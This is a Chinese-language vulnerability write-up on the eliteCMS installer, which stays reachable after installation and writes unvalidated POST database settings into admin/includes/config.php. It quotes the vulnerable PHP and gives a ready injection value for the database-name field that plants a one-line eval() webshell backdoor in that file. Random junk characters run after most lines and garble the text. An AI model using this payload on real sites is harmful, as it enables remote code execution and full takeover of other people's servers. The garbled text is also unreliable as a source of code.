eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装# c* W2 q! u+ v T+ A1 [5 O
$ O$ J& f+ M- c5 C, v( z2 t另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
& C: Y: r" j0 _% x' H: F8 t我们来看代码:
+ L- o9 i9 j! Q
- ^9 y. _6 v8 B5 G$ R P$ j...
# v0 {% b# j& D7 U& \9 oelseif ($_GET['step'] == "4") {
. T# x% z9 h4 T, Z $file = "../admin/includes/config.php";; q" M* C c+ @, \; I. h
$write = "<?php\n";* l( Z/ z h0 ^9 V% N- R6 [9 [
$write .= "/**\n";) x8 h3 d) b6 |/ v% C$ K3 ?/ Y
$write .= "*\n";) w& F; S) y1 B
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";: \. ?" F, \+ `5 }! k, T
...略..., T7 ?" `6 r6 ~) A6 x! }% S
$write .= "*\n";/ I) h# Q& d2 `. |& V
$write .= "*/\n";
- y% I( n- M1 U8 t6 ?# V5 A $write .= "\n";
% _1 i* o5 \9 W3 r2 T# n $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
) d# p# }! p# h; r $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";; M- R$ o9 v- q$ n8 V2 a+ B
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";8 F8 F! h) ^. D* `% _) w
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$ v' L" P( B. y1 r% {: C0 F2 s $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
2 i) G i9 H8 n0 T8 R1 l+ A $write .= "if (!\$connection) {\n";2 c# t( D8 E- }6 A1 x
$write .= " die(\"Database connection failed\" .mysql_error());\n";
5 n i0 |! _' p7 p $write .= " \n";2 I" i$ N- K6 Z$ s8 e/ d
$write .= "} \n";
4 v6 b7 T& n; J6 Z, i6 @! G $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";: Q& O7 u% \7 q: x& I) _# Z6 C# q" f
$write .= "if (!\$db_select) {\n";9 M7 O% }" @, J; W' G9 m) l; E
$write .= " die(\"Database select failed\" .mysql_error());\n";3 y4 K1 Y. B9 s" m( j( L( }9 B9 s$ u
$write .= " \n";- O& s, l' v. Y9 j6 S
$write .= "} \n";
0 ]- \) c. \/ r% ?4 I% Q9 b3 n $write .= "?>\n";
4 ~! R% M. z8 j: `3 H* S
2 Q0 v" _: F8 ~' L- U4 A $writer = fopen($file, 'w');' J& J c) \4 E U( s
...! l/ r" V( Q4 i6 i/ d7 C* T
( H( {: f$ _4 a" r5 M* ?! n4 o
在看代码:$ F* L1 u3 \ G; @# F
" D2 O7 w0 T2 y, P" C7 J- L t$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
g' s6 y8 q) U0 [5 l( D0 p0 P+ [8 @$_SESSION['DB_NAME'] = $_POST['DB_NAME'];5 a4 z( U+ ^5 c$ c2 P- Y
$_SESSION['DB_USER'] = $_POST['DB_USER'];+ u& X3 `) @: H3 e$ L6 v
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];) |3 c% a$ N) g K$ g& S! Y
7 m6 E& \. l2 U取值未作任何验证
- |* `1 _. W2 C0 q+ \如果将数据库名POST数据:% `, m- ~6 A5 h( B5 d
/ E0 K, C: U. \3 H) ^0 v- f"?><?php eval($_POST[c]);?><?php
* ~% {" j, G: L$ d2 A9 L 3 k, S9 q( k! u9 O8 p8 g
将导致一句话后门写入/admin/includes/config.php
1 V5 O* s- @7 E/ b. Q! d, z |